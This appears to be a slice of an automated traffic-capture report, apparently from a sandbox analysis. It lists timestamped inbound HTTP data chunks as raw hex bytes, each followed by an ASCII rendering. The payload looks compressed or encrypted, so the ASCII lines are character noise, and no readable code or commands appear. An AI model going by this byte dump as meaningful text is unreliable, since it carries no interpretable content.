                                                                                                                                                    2022-09-29 12:59:18 UTC27351INData Raw: 37 de 42 02 f0 2c 32 59 bf 13 f5 41 8a ed cd 07 3f 9d 72 3d e6 20 20 c7 f5 b1 7e 99 5b 60 ee 2e b6 20 63 e1 ce fa d0 0f 19 e6 5d 64 b1 b3 1f 58 46 29 dc 87 cd 98 00 27 66 fc 35 aa 08 92 34 81 72 59 0b eb 12 d9 e8 38 69 70 df 74 2b c0 26 26 e6 12 7c 9e b0 21 73 8a dd c0 51 7d 36 c3 d7 ea 64 08 c3 e1 56 f0 ed 25 2f 6c ee 96 7c ad d5 44 af 4b 92 61 ab 68 cb a5 c1 1f ce 41 62 a3 27 6a 92 59 4d d7 92 84 61 80 0e 2b ac 63 56 5c 9c 3b ce 6a d8 11 30 ba d0 65 f3 72 5b 8c c2 02 92 35 17 86 d2 bc 2f 1f 82 0d 8f 2f a7 3c 14 ec bb a6 ec 75 30 20 12 8f 99 65 ba 2c 42 8c ef 0a d4 da 50 d5 7d 37 b2 70 d8 11 17 12 30 c1 6c ae cc 04 d7 3d 1d 6b 79 77 67 48 fb 41 90 2c aa 9c 27 71 05 00 ef 3c 68 26 db 3f 12 1f ab e0 87 b2 5c 8d cb 2a 1e e3 46 1f 4e 70 f6 5e 3c 19 26 f0 77
                                                                                                                                                    Data Ascii: 7B,2YA?r= ~[`. c]dXF)'f54rY8ipt+&&|!sQ}6dV%/l|DKahAb'jYMa+cV\;j0er[5//<u0 e,BP}7p0l=kywgHA,'q<h&?\*FNp^<&w
                                                                                                                                                    2022-09-29 12:59:18 UTC27367INData Raw: 7b 68 d8 25 d4 6b 4c e2 08 2e 75 35 36 e3 ec 87 9e 2b 78 cf ac fc 43 3d d4 8b 77 c1 d3 81 b3 5a dc 2c 34 84 95 a6 3f 88 33 ca 88 9f 6b 95 b4 43 23 3b 73 5e e9 00 0c 08 7b 94 f3 72 ef 80 7d 35 8b ab 8e 64 03 32 bf b9 54 58 f3 a4 93 e1 c6 7f 44 40 4e d9 1a 09 0e 5f 11 37 02 5b 79 d5 8d 83 a2 09 c8 18 89 aa c5 cf ef 90 79 90 c5 7e 20 9c f7 70 99 9a 53 9d 0b cb 36 fc b4 2a f1 b8 57 fd 53 0c e2 c4 c5 eb da 37 b5 64 82 d2 1b 95 ff 67 5f 6c 42 f7 34 06 87 23 a1 0c e0 ff 7b 8d 04 d6 53 0e 79 63 2b 77 95 d1 55 75 ac df ad be 91 47 b5 7f 7a 57 5f bf 16 80 33 c7 dd a8 74 8d aa d7 c4 9e b7 e3 59 c2 15 24 a0 7c 3c 03 10 ec e6 e5 f2 99 a2 1a 0d d0 bc 6c 01 b9 34 88 73 41 24 5e a4 c8 fc c2 ce cf e8 bd 7e 7b 63 42 ef 23 06 4f 73 86 5c 2f 07 00 a2 06 54 19 12 4b 4b 96 45
                                                                                                                                                    Data Ascii: {h%kL.u56+xC=wZ,4?3kC#;s^{r}5d2TXD@N_7[yy~ pS6*WS7dg_lB4#{Syc+wUuGzW_3tY$|<l4sA$^~{cB#Os\/TKKE
                                                                                                                                                    2022-09-29 12:59:18 UTC27383INData Raw: 0c 2a 6f 84 b8 25 ca cd fe 3c 55 e0 f5 54 bf 4b c7 34 66 fd 85 02 da fe 3b 2c b0 d5 54 30 8d 18 58 c3 68 e9 47 a9 51 f0 ed aa ea c1 6b 2b 66 30 83 83 6d 78 f3 48 18 a9 95 3d 10 00 a6 13 b4 f8 a7 62 c5 f9 b3 bc 1a da 25 67 e5 85 00 11 09 06 52 5c 61 22 94 6c 06 de 6b 55 ff 4d 50 55 69 ce 3d 8d 2c 3a 1f 58 9a 76 f7 7a 5d 55 f0 95 da 1b b9 da 63 87 58 20 38 99 b6 8d 5e 5d bc 4d 79 3c 36 4e 7e 98 e7 32 ad 8e b8 ed cb d0 d7 cd d7 b8 54 87 0b 95 a8 29 f0 e4 e8 7a 57 ae 5c 99 53 a7 3b 2e b3 c2 07 bb 42 eb 8f 81 0c d5 ef f4 0c ba 00 04 fc 30 35 55 f2 db f4 49 2c 31 d5 5c e1 80 4b 0a d0 2a e0 aa 92 36 18 70 08 e5 cb ee db b2 97 5c db 92 4b 2b 94 8b 7c 12 54 3b f2 07 0d 3f a8 47 e3 9d 55 f6 97 bc 70 b0 b9 f9 6d 7b 37 6c 22 35 8e 3f aa 4a 41 b9 7a fd bd 17 1b 3b c0
                                                                                                                                                    Data Ascii: *o%<UTK4f;,T0XhGQk+f0mxH=b%gR\a"lkUMPUi=,:Xvz]UcX 8^]My<6N~2T)zW\S;.B05UI,1\K*6p\K+|T;?GUpm{7l"5?JAz;
                                                                                                                                                    2022-09-29 12:59:18 UTC27393INData Raw: e1 cb 4f d7 66 50 53 d4 f3 65 2d 93 6d 08 5d 15 a9 66 cb 02 88 4e 6c 79 0b cd 16 3f 70 9c fd ae 89 f8 91 40 df 92 ca d6 14 96 88 de 97 55 cb 5d c9 92 d5 7b 5b 94 ff 5d c4 3f a7 a6 01 2d 5b 54 b1 36 38 dc f7 cf 71 25 02 c9 9b f0 ac 6b 33 89 1b 9b aa f4 d8 0a 50 7b d3 82 1c 90 df ac f2 8a 29 3c 3e e0 c7 5c e8 fd b0 50 e6 f5 8c 03 a5 d4 cd 32 9e a3 c3 fb c5 6e 1f 15 a8 bc f8 f1 ef e7 01 84 aa 20 e5 eb 03 2f 06 dd 64 f9 50 c6 0d b2 20 72 3b 7b 54 00 ce 4e 8b c7 95 fa 3c c9 71 8c e2 1d ca 4f fc 1a f3 56 b1 f7 73 17 f8 57 f2 cb 62 71 96 0d c9 eb 95 bc 71 97 c6 2f c9 bc 2c 7d 44 09 b5 15 06 91 db ba 0b 2a c0 e2 80 86 3f 92 37 bd b8 b0 99 36 21 a7 58 62 53 0d 62 a0 9e 45 61 22 fa f9 47 29 ef 1f 80 1c b2 aa 3f a3 79 e4 48 6e a7 fe 72 f2 74 21 b0 a1 ce 97 6f b1 64
                                                                                                                                                    Data Ascii: OfPSe-m]fNly?p@U]{[]?-[T68q%k3P{)<>\P2n /dP r;{TN<qOVsWbqq/,}D*?76!XbSbEa"G)?yHnrt!od
                                                                                                                                                    2022-09-29 12:59:18 UTC27409INData Raw: 1d 5b 09 ac a9 f1 f2 ee ba c3 04 83 be 5f 61 ad ee 07 36 2a 4e 6d 94 df 5b ba ae ce 19 7d 68 d1 95 7c ce 82 85 e9 13 24 85 87 ff 98 14 43 2c 7a 93 a6 b2 0b d0 e9 2a 29 29 81 93 40 a7 b2 48 2b e3 0c 7d 6b 73 2a 09 be af 57 72 9f ec 54 66 49 67 92 87 c3 f5 93 bd 2c 9c ad f0 68 a0 42 3d 01 44 b9 a3 09 7b e1 5b 6f ae 5d 4e 5d 26 0c a5 c4 ba eb ed e1 5f 6d d0 e6 52 cb 97 a2 1f 56 cf a7 c2 dd f0 7b 73 ae ec dd 60 56 22 ac 0c 0a bc c8 c7 34 4e 89 8d a1 74 4d 84 03 2e b3 81 1c e1 ab b8 35 20 c8 3e 30 ce ae 5b 01 95 aa b8 ea a4 3a 77 5e df da b3 d2 4a 3b 25 fc 7d 78 70 97 d4 02 0b 52 32 6f be 8e 3e c0 58 47 df 4a ec 49 0c a0 a1 2b 72 8c 6e 2a cc 28 85 6d 1b c5 3d 0d e6 4e bb 7a a3 55 f8 31 ed df f9 4f f5 e8 16 de 1b 47 1d 53 6d 3a 00 b8 7e cd fd c9 65 35 9a 1c d6
                                                                                                                                                    Data Ascii: [_a6*Nm[}h|$C,z*))@H+}ks*WrTfIg,hB=D{[o]N]&_mRV{s`V"4NtM.5 >0[:w^J;%}xpR2o>XGJI+rn*(m=NzU1OGSm:~e5
                                                                                                                                                    2022-09-29 12:59:18 UTC27425INData Raw: fb 95 f8 fa fd 2f 2e b1 2a c7 e5 02 41 3e 32 fc bb bc 2e 3b e6 8c 0f e3 72 18 e5 6e c6 b8 26 e3 37 1d b4 04 ba b9 46 28 e2 c0 d3 86 0b 5d 33 5a 35 52 de dc 4b 32 dd d8 d4 d8 5a 87 b5 01 ec b4 7b ff d2 d7 3e b2 2e 89 2b 53 c1 8b 38 7e 73 a5 13 60 37 4d fc 96 4f f3 82 a4 3b cd 3c 07 99 d0 57 7d ac 0c 7d 77 c8 a1 0d 65 e3 2e ca d2 0c 37 34 c9 ac 40 94 5b e2 70 20 9e f6 ec 3d 9c 2a 51 30 9c b4 6f 06 50 e8 71 46 27 c4 9b d4 9d 13 b5 26 6e 63 3d 68 4e a3 90 25 8b 97 24 fc 55 bf 7f d9 64 4f 17 1a 4e 93 fe 7a 8e 17 63 40 24 e9 6c 68 1a 36 de 78 a4 27 d2 8e f6 87 aa 1c 85 99 8b fe ec e9 d0 12 81 4c f3 19 15 8c f6 e8 74 9b ee e3 e3 17 1f d5 55 86 c3 5d 23 00 95 e3 f8 6d c3 03 bd dd cf 27 b3 43 6d 10 ba f9 53 ba a3 49 1d 80 73 21 94 7f 6e 10 c2 c4 fb 9f f8 31 19 b5
                                                                                                                                                    Data Ascii: /.*A>2.;rn&7F(]3Z5RK2Z{>.+S8~s`7MO;<W}}we.74@[p =*Q0oPqF'&nc=hN%$UdONzc@$lh6x'LtU]#m'CmSIs!n1
                                                                                                                                                    2022-09-29 12:59:18 UTC27441INData Raw: 36 91 9a 18 c8 17 24 3e 3f 7c ee a7 22 7e ac 84 87 9a 25 d5 f2 ff 46 c8 20 6f 19 c6 7f e3 19 a3 00 9d 1e 37 89 e6 21 82 37 53 df 4b 14 82 7b 61 f3 cc e8 23 ee 00 12 15 12 92 c2 b3 ac c4 e3 6e e8 54 60 2c 21 06 2f 2f 12 43 48 55 a9 11 b1 83 65 1e 1a ba 3c f4 03 9c 7a 6a c5 3c f7 ac 1c ca d4 bf d7 2c 95 93 dd d3 26 d7 72 6a d3 f4 33 b3 05 1c 02 68 41 bb 30 e0 e6 d5 d5 ac 11 b4 a4 24 0b b2 07 49 07 18 b4 c6 33 77 4e 6a c7 56 fb 89 dc 07 d7 9a 7e 7d b6 a9 72 b6 18 a1 80 75 d7 93 7f d8 5d 52 6d f6 48 8c 57 cd be 09 61 19 a1 7a 28 2e f2 90 31 78 dd c7 10 6b 99 c0 01 bb 73 5e 25 06 73 94 80 41 73 25 ed 34 cb aa 99 00 4a 19 42 41 7c 29 7e a0 cb 15 97 5d c5 46 1a 65 e3 fc 1c be 83 06 f7 0e 87 18 45 50 82 54 64 bf e9 14 91 d0 69 8f cb 89 6c ac 03 29 db ca 8e 13 fb
                                                                                                                                                    Data Ascii: 6$>?|"~%F o7!7SK{a#nT`,!//CHUe<zj<,&rj3hA0$I3wNjV~}ru]RmHWaz(.1xks^%sAs%4JBA|)~]FeEPTdil)
                                                                                                                                                    2022-09-29 12:59:18 UTC27457INData Raw: b3 39 60 98 5e 51 f2 f6 9e 5d 2c 43 a6 8e 9f 79 b2 ea 8d e4 47 23 f1 85 a7 00 5e ef 37 f2 ab 37 78 1a 7b 0b 87 58 50 d8 8d fc 46 6b b8 56 f8 68 9e d4 00 53 15 d3 c7 4e 0b 09 88 4a 81 2c 33 0b d3 bc ac 2a 90 dd 2c 4d 7b f3 80 e2 93 74 0c 9b a3 d9 70 06 c1 4b 50 a6 91 b8 91 cb ed 3f df 17 4a 05 b3 cc 9d 0e 81 fd 5b ef f3 3c 36 e0 a8 ab 6d 07 dd f1 45 30 c1 1e a3 9d eb 2b e0 9b ad 60 c8 2e 5a 55 ea 6e 3d fd c6 b1 8e b3 4a 1b 5f f6 05 db ea 3f c2 c2 6f 9e d0 cc 70 f3 18 44 f2 27 65 45 04 af eb a4 61 3c a3 54 25 9c 21 53 f0 69 87 b2 6c cd 35 92 37 1e d2 2f ff 66 45 fe 7e 6a ee 53 9b a8 11 db 52 e8 ab ee 5c b3 d1 2c d8 96 18 9d fb 05 9e 7a b1 07 58 96 5c 3c df 42 ae 74 b4 4f 4d 1e b6 b1 1a 93 af 4d 54 a3 75 75 94 80 7e af 44 25 f5 8c f4 6b d7 29 88 ae 32 19 42
                                                                                                                                                    Data Ascii: 9`^Q],CyG#^77x{XPFkVhSNJ,3*,M{tpKP?J[<6mE0+`.ZUn=J_?opD'eEa<T%!Sil57/fE~jSR\,zX\<BtOMMTuu~D%k)2B
                                                                                                                                                    2022-09-29 12:59:18 UTC27473INData Raw: 7e 63 50 e9 b9 0d b2 5c 07 a6 6a 28 b7 37 d2 76 89 34 4b 8d 34 fc b4 51 58 a8 a4 28 a5 6c 6a 72 48 8e c4 24 7b d4 8a 96 30 bf a8 51 f1 3c c9 a1 d0 00 d6 9a 5e 1a 30 72 55 55 dc b4 31 42 4c b8 f2 d3 5f 72 ea 0d 2d 33 94 a0 ad a4 f1 7f fd da 49 45 e0 27 4d 6d ee ed 73 ba 10 c1 bd 2f ab 65 da 90 2c 0d 22 46 28 f4 ba f2 5f 80 74 f3 06 a9 93 a3 66 c7 b0 43 13 2f 36 ae 95 69 f7 28 46 4f 15 e8 c4 82 78 9b 25 b5 3b 21 f8 a7 ec 1b 73 f1 21 23 81 80 9e ed 53 20 63 cc 2e 5b 25 2e 34 18 5d 9c 00 8b ec a3 77 21 29 6a b0 36 41 fe 76 e9 1a 53 94 32 3c b0 53 e4 91 ed 47 e3 c5 ac 63 11 a9 30 5d 74 3b 33 3e cd ab 33 a4 8d 47 7f f4 fe 04 f7 68 46 de c3 a6 d4 3a 35 55 65 74 20 5f b0 84 3d fb ff 8c 39 18 49 9d a9 79 9c ef 0d e2 3b b0 b2 d7 22 63 8e 57 f2 76 eb e9 65 be d4 22
                                                                                                                                                    Data Ascii: ~cP\j(7v4K4QX(ljrH${0Q<^0rUU1BL_r-3IE'Mms/e,"F(_tfC/6i(FOx%;!s!#S c.[%.4]w!)j6AvS2<SGc0]t;3>3GhF:5Uet _=9Iy;"cWve"
                                                                                                                                                    2022-09-29 12:59:18 UTC27489INData Raw: 47 19 9d 75 58 41 89 4a 96 e8 4c 7c a8 84 ba 05 b2 43 87 bc 84 aa 58 f9 09 ab 58 b6 db d4 18 19 7a 3e 9b a8 c9 67 a9 c1 a1 17 84 2a 10 ab c1 8f b1 2d 29 6c c2 1d 05 75 b3 ea 6e 56 1a ce 38 2e 62 8a 07 3d 2d de 63 30 52 67 da 3f 46 53 bc 53 0b 52 6c 02 32 cc a9 b2 ce ad 5a 79 bd 7f d4 91 61 0d f5 ef ea 64 8f 3c 0b e8 da 2c 77 14 26 7c f0 94 58 8b 00 f7 52 88 7a a6 9f c1 34 bc c8 3e 47 81 d8 7b c1 2f e9 1d e8 25 ef ae 35 16 a1 eb f5 8a 9d c0 bb 6e 54 c9 e5 b7 ae 24 ea a7 67 07 28 01 5c ff 5c d4 96 50 4f 2c f7 b2 49 b7 33 73 5f 9e 57 ef ea ae 45 39 25 75 4b 68 ba 13 2a 3f 5f dd 3c 84 e4 23 00 5b 27 e8 ae aa 21 70 f7 20 b8 8e 25 77 00 8d e2 8b df a4 c4 74 da 46 c3 c7 93 2d d7 94 ac 41 c6 d0 8f c9 0d d2 11 c4 8d 87 11 44 e9 3e c3 de 17 d4 73 ca 88 75 51 2d 18
                                                                                                                                                    Data Ascii: GuXAJL|CXXz>g*-)lunV8.b=-c0Rg?FSSRl2Zyad<,w&|XRz4>G{/%5nT$g(\\PO,I3s_WE9%uKh*?_<#['!p %wtF-AD>suQ-
                                                                                                                                                    2022-09-29 12:59:18 UTC27505INData Raw: a7 77 e8 36 5f 85 be 3a 94 2f 0d 9b dd 20 73 f8 1f 6f 75 b4 2b 86 0c ae 8d c4 d0 c0 93 35 59 24 d5 e6 3d fe 6f e3 42 ed f6 83 31 2d 81 57 85 f3 e4 b1 53 0b 45 ff ae e6 79 d4 1f 5e 2b b7 9e 53 44 72 66 6f b8 7a 10 60 88 dc c3 a1 0c 23 06 76 cb 4d 05 6b f1 4e 90 1a a2 45 dd 19 4b 5e 6f 9f 95 f9 91 a6 1d e5 22 5b 9d 75 2c 83 97 46 f9 41 64 23 6a 1f 99 c8 e2 2c 6a 90 19 50 d8 14 34 2e 83 c3 30 3b 80 f6 10 21 98 9a ec 80 a6 18 7f 23 9f e0 16 64 be 82 64 12 f8 af 74 ad 7c 90 01 0b 55 60 df 76 29 4b 01 a0 88 9c bb 93 77 cf 17 57 0c f5 fd bc ba 5b 5d e9 c5 8d 04 1b e8 5c 66 96 44 2b eb 97 45 5a 59 96 77 85 9c 8f 96 dc 44 dd 79 fd 77 c9 76 f7 7c ff fc e8 3e 97 e5 0c 58 55 be d1 bd 53 dc a0 03 b1 f7 43 8a 05 d8 8b b6 7f 07 a5 86 6f 0b 7f 72 13 c3 36 ef cd 76 4c ed
                                                                                                                                                    Data Ascii: w6_:/ sou+5Y$=oB1-WSEy^+SDrfoz`#vMkNEK^o"[u,FAd#j,jP4.0;!#ddt|U`v)KwW[]\fD+EZYwDywv|>XUSCor6vL
                                                                                                                                                    2022-09-29 12:59:18 UTC27521INData Raw: 3f c2 06 59 72 4c d4 b6 b4 67 57 45 4c 46 28 9d 86 de c2 35 1e 07 cc 79 e1 19 43 23 04 0d e7 95 d5 8d 00 1c 44 7f be fd 78 73 8e 84 86 29 c4 22 80 72 be df 45 b2 28 44 72 92 b9 e4 1f 37 4f 26 2d 58 ce d9 34 49 5a 0a d1 d4 4b 7b 47 e6 0d 7d 85 ca 7e 1f 00 4c bb bd 1c 48 2c 1e 22 3c 0a 48 d1 09 db 7a bb 55 13 92 3d 79 af 18 1c 9f 5b e1 6f 62 a6 2b 9f fb 93 77 9d 86 d8 1b b3 28 9b 5f a4 a1 0b d0 59 e7 13 30 6b 31 84 64 9c ba 41 b0 6c 94 51 48 a2 ad 02 c5 0a 2e 87 db ac 15 b5 7f 79 a3 0f 48 9e 13 0c b8 74 2a 2e 61 1e 5a e5 80 e6 8d a5 aa a4 8b b3 97 5e f6 a2 e8 26 38 5b 25 5d 98 61 7d d2 b1 08 74 1e 40 22 15 4f 55 e8 0a 6d a2 db ff de a5 c1 ab 11 eb 7d 41 07 99 2c b0 3e 0d 57 9f a1 40 87 c4 73 20 3c 23 99 83 ba 86 06 a7 3c a0 cf 47 17 20 a8 df 2c 36 b4 5f bb
                                                                                                                                                    Data Ascii: ?YrLgWELF(5yC#Dxs)"rE(Dr7O&-X4IZK{G}~LH,"<HzU=y[ob+w(_Y0k1dAlQH.yHt*.aZ^&8[%]a}t@"OUm}A,>W@s <#<G ,6_
                                                                                                                                                    2022-09-29 12:59:18 UTC27537INData Raw: be 54 7c 16 6c 4a 19 23 65 98 69 b0 48 0e a0 9d 31 b5 9b 97 ed 6f 57 6a da 6f c5 44 de e3 be fc 88 b8 04 71 b2 5b a7 ed f3 e7 19 7a cc 96 99 84 cf 22 1f 83 15 12 eb 5f 0a 3c ab 63 8b 17 9d 24 26 6a 12 e2 70 2e 11 31 b6 88 cf 08 68 3b 81 39 ed 0e 37 f6 13 61 e3 01 f6 cc c2 20 db 8d 3f ed f1 55 61 56 44 54 77 03 b0 8c 50 3b 81 c7 45 14 75 08 4f 1f 2a 0a 02 79 e9 b8 d9 5c 28 4e fe 6a 16 18 81 c8 05 10 2d 2a 6d 52 59 c6 52 ac 17 fc c7 91 89 63 15 53 b6 a4 b8 d0 a9 a4 75 dc 39 7d f1 4d d3 cd 2d 37 93 71 5e 47 4d 05 8f 30 75 33 c0 b7 34 4c 7e da d0 ea e7 33 23 2b 27 57 e0 c4 87 6b 4e 43 80 71 3b a0 00 6b 86 8b af 39 7b 41 1a 44 b2 44 16 0b 5e 23 16 0f b4 15 45 32 0d 32 42 9a e1 70 36 09 30 03 de 53 3e 40 9f 32 a4 9b c9 20 68 53 45 e6 c8 be 38 a0 57 02 c1 c2 af
                                                                                                                                                    Data Ascii: T|lJ#eiH1oWjoDq[z"_<c$&jp.1h;97a ?UaVDTwP;EuO*y\(Nj-*mRYRcSu9}M-7q^GM0u34L~3#+'WkNCq;k9{ADD^#E22Bp60S>@2 hSE8W
                                                                                                                                                    2022-09-29 12:59:18 UTC27553INData Raw: e3 12 f6 2f 74 53 4a 6b 97 6c dd ba 8f 4d 29 77 ba af d9 1e 22 4f b5 ee 48 68 45 43 e9 10 b3 92 f7 f0 29 c9 fa 17 c2 84 5a f9 48 9c 84 69 8d 92 e2 43 4c 12 71 91 50 3b b2 3e 9d 9d 42 86 84 75 b5 4d 56 02 1f 6b e1 7c 85 8e 2f 1f 95 52 29 e3 fb 30 ea 8a b9 a8 c2 78 c2 79 7e 0d fe 6c b9 f4 4e 9e da ae 94 3e 5e 99 83 18 a8 5b 0e d3 b0 a4 be 9e eb ff 13 cc 1f d5 ff 54 79 c1 fb d8 d9 42 cb 00 68 4b 8e c3 4b 28 c9 74 7f d5 e2 27 15 93 c2 a7 21 66 2e 1b 24 84 13 a6 a0 de a4 63 6a a5 8d fe b2 ec 5d e0 65 03 1f e2 7b 18 60 14 e8 5d bd e9 a2 90 f7 5b ce 6c 02 1f 11 40 d5 95 dc 73 d0 07 0d 93 c1 00 1f b0 b4 2a c8 8e d7 cb d5 11 73 8f 7b 5c 59 49 89 41 7f 23 1d 9e 23 6e 30 7d bc d9 43 35 b0 71 c7 a0 7a e7 05 fc 31 45 da 9b a6 bc 4d 0b c8 17 85 a6 3a 22 4f fa 90 d9 70
                                                                                                                                                    Data Ascii: /tSJklM)w"OHhEC)ZHiCLqP;>BuMVk|/R)0xy~lN>^[TyBhKK(t'!f.$cj]e{`][l@s*s{\YIA##n0}C5qz1EM:"Op
                                                                                                                                                    2022-09-29 12:59:18 UTC27569INData Raw: 86 15 50 87 6e a8 68 b9 ae 71 74 98 b7 c7 27 2b 31 7d 52 4a 5f ae 77 49 a7 b1 07 cb 76 67 95 78 1a 4e 76 36 56 22 51 a9 03 65 fe b8 4e a4 10 db 68 46 95 7d 7d af 64 76 93 39 44 86 b3 c7 78 3e 37 2c 71 e9 c2 ab d3 26 da 17 35 6d 47 6a 9f 34 c6 fa 0a 5b 3a 58 84 20 cb a0 c3 ce 90 8c 9e bf fd 78 4b d5 e1 f8 82 f8 27 6d 2f 2e 7d 15 0a b4 2e f7 42 de ae 86 fd 02 19 66 53 fe 9d 6b 73 f8 9a c2 68 01 cf 05 60 56 6b 88 16 2f 60 c5 1c 76 cc 1f 82 95 63 cb 64 c2 13 ed 02 97 d4 7b af ad 98 24 7c 5e bf 9d 7d de 2b a4 e8 84 d4 88 7b ef 24 a5 6d 74 d4 c4 7d cc 9c b6 1c a8 1b 9e 70 b5 df d1 4c 7f 78 26 6e 7e 69 e9 08 e3 f5 4f 5c 5f da ba cd 9e 13 5d fd ba 67 34 99 f3 fa bd 65 06 0a 25 23 ae 4e 39 02 95 08 68 0d 79 0b 4b c1 62 6d fd bf f9 c6 61 e6 e1 4b 1a 52 5b 34 f2 23
                                                                                                                                                    Data Ascii: Pnhqt'+1}RJ_wIvgxNv6V"QeNhF}}dv9Dx>7,q&5mGj4[:X xK'm/.}.BfSksh`Vk/`vcd{$|^}+{$mt}pLx&n~iO\_]g4e%#N9hyKbmaKR[4#
                                                                                                                                                    2022-09-29 12:59:18 UTC27585INData Raw: 56 21 d1 ef 01 92 93 05 ca ff de 40 85 2d 98 32 cc 7c 38 1b 45 91 00 ae 2e 41 de 4f 28 12 ce 89 7c 35 a9 c3 7e 5b a2 3d c5 16 f3 c6 b9 ea 98 fa 80 0f 9b 44 54 3c 60 6a 81 85 83 c3 8e 47 97 23 b9 09 fd 0b 53 e1 90 82 f4 8a 17 a3 b3 97 99 6e bf 80 7e f8 c3 6f d9 ea ed d7 72 a8 e4 10 ad 02 1c 68 ac 25 f6 e7 48 19 d7 3a 6c 8f 4c e8 df 82 e0 23 5a 27 f4 b1 66 d2 b0 db 54 30 f8 12 25 54 f5 bd 26 9e a1 b1 5a 08 88 4a b0 60 22 0b 30 8d 95 85 47 e7 8d 40 ed 54 33 79 3b fe 71 95 4c 1c 15 fe bf 12 cd fd 61 af c8 6e b5 61 70 8d 6e c2 17 f8 77 ad e1 52 20 0f f9 be dd a4 96 bf c7 e6 3c 18 d8 06 91 59 f6 55 62 a3 23 b3 61 ea ed db 67 e8 15 ef 67 ed 6d 48 67 6e 48 d1 a3 ae 80 8d af 0b a5 88 b7 5d 1c ba 69 0c ed 99 96 d9 a2 b4 9a 73 29 58 0b e0 f6 18 03 ca df 23 2a 69 b4
                                                                                                                                                    Data Ascii: V!@-2|8E.AO(|5~[=DT<`jG#Sn~orh%H:lL#Z'fT0%T&ZJ`"0G@T3y;qLanapnwR <YUb#aggmHgnH]is)X#*i
                                                                                                                                                    2022-09-29 12:59:18 UTC27601INData Raw: e6 f0 c5 d2 73 40 e0 2b 7f 84 10 dc 85 96 dc 93 e6 62 e8 39 2e 5d 37 70 06 ea b0 1d b8 69 3d 58 85 b0 e2 95 47 23 60 48 e6 1c 60 c0 75 2d 12 7f 63 3a fd 61 88 2e a7 0a 89 21 db fe 7a 2e 9b ac 9e fd 79 31 08 dd f4 a4 51 ec 2b b3 fc 78 41 79 df 0c ac 47 d3 4a c6 13 db fb 19 9f c1 9d 4c 39 14 02 b2 80 27 69 21 33 dc 65 dd 36 ce ed fa 5b 06 19 90 82 af f7 90 4c 6a 03 df 4f 33 0a be 49 09 2c 9c d1 c0 f8 72 3d ce da d8 a6 3f 8e 9e 07 1a a9 a6 58 9d d9 09 fe c3 33 93 9b 2d 14 6f 2c 45 75 43 80 bb ba 03 63 1b cd b3 ce 96 39 7e 9c 4b 0b b6 5d 5b 53 c8 37 d5 77 86 7c 46 90 23 d5 1f c3 2c 5f 40 c9 e1 24 35 88 3b 08 ed 50 af 0d df 9f 26 28 45 5c 9d 76 84 63 de db ff 64 48 c9 d0 11 cd 4a d0 39 fd 60 1a d9 04 4b dc df 22 cb 52 f8 a0 11 7b 87 d4 ec 1d 8f 05 a1 10 69 4f
                                                                                                                                                    Data Ascii: s@+b9.]7pi=XG#`H`u-c:a.!z.y1Q+xAyGJL9'i!3e6[LjO3I,r=?X3-o,EuCc9~K][S7w|F#,_@$5;P&(E\vcdHJ9`K"R{iO
                                                                                                                                                    2022-09-29 12:59:18 UTC27617INData Raw: 96 a8 01 c6 6d 03 49 7f 17 e8 bc 46 a1 84 b0 ec 1c 58 95 df 50 d9 64 1b 96 90 88 99 c4 a8 fb 0a 0e f7 97 ed 4d 9f 83 7c 2a f3 ec 82 b0 1d d8 c4 bc 26 f9 a4 40 fe f0 10 74 00 4d f9 3b 51 77 fa 12 0a 07 38 13 6a 46 9a 8c 27 c8 4a 27 d3 65 21 0f 17 81 39 73 6f 13 0b 34 9a 48 0e 4f 82 84 0a 56 23 72 b3 b0 e1 fd 7a 2a 99 66 97 1e cc 50 1b 3a d0 29 f4 d6 c9 53 ab 91 df bb a8 a4 43 ea 35 c1 93 70 24 8f 3b 5f 84 d0 31 4e 25 98 2c d8 6f f8 c9 70 d7 66 6c fd c9 9b 9a 0e 77 a9 44 7d 43 34 0b 87 98 4a fb f1 1a 0a 30 f2 ab 50 ba 64 2c c4 c3 9d 06 f3 ac 64 28 29 ea e0 0c bf 90 0e 9a 8e 5f 4c e5 fa a2 d2 b8 1e e9 56 31 d1 d9 0d 3d cf 05 18 1c 49 43 22 df ba 11 56 25 10 99 a6 19 6c bd 37 4b 24 85 d5 43 0e 96 ff cb ba a2 b9 b6 0a e4 8b 02 5d ca 17 5d 57 ac b5 d9 c1 61 e2
                                                                                                                                                    Data Ascii: mIFXPdM|*&@tM;Qw8jF'J'e!9so4HOV#rz*fP:)SC5p$;_1N%,opflwD}C4J0Pd,d()_LV1=IC"V%l7K$C]]Wa
                                                                                                                                                    2022-09-29 12:59:18 UTC27633INData Raw: 0f 0f ab 59 fa 29 f9 08 38 99 df 90 a2 1f 62 20 25 04 82 cc 68 51 19 16 ce a5 d1 ca da 59 72 4e 85 f3 16 99 b1 2a 80 d1 74 72 b0 cf c7 22 08 30 c7 a0 7e b6 ab c6 4c 26 60 0a 2f af 6d 69 78 d4 d9 cf 97 6c eb 57 ba 81 ba e6 3a 78 d2 77 6e bf de ca 6e 05 74 a6 e2 39 e8 69 9e 5a 88 4f 45 de 7a 0d c8 7a c1 47 df 29 86 75 e1 44 6b d9 33 cb 2f a6 9e 95 8f 2a 55 10 29 07 d8 27 8f b6 1a 16 d1 1e d5 90 fb f6 ab a0 5f 18 8a f2 7b e9 c7 c0 b6 31 97 c9 84 f1 bb a1 ae 82 2d df 97 70 3e 1b fa 87 e3 c8 48 79 fd 29 37 76 76 58 bf 5b 76 02 78 f4 30 df 7c 2d 3d 82 9a 95 d0 e4 b7 9a ca 5f 44 72 db a8 e2 52 20 0a c8 48 26 36 00 05 c4 97 15 d7 4e f1 94 6d d2 eb c3 95 15 13 9e 5d 6c 98 62 f4 da 96 58 03 e0 9c a8 dc 28 7b 93 5a 97 01 19 a7 4f 65 c4 b9 81 d9 44 fe 12 ec aa e0 b7
                                                                                                                                                    Data Ascii: Y)8b %hQYrN*tr"0~L&`/mixlW:xwnnt9iZOEzzG)uDk3/*U)'_{1-p>Hy)7vvX[vx0|-=_DrR H&6Nm]lbX({ZOeD
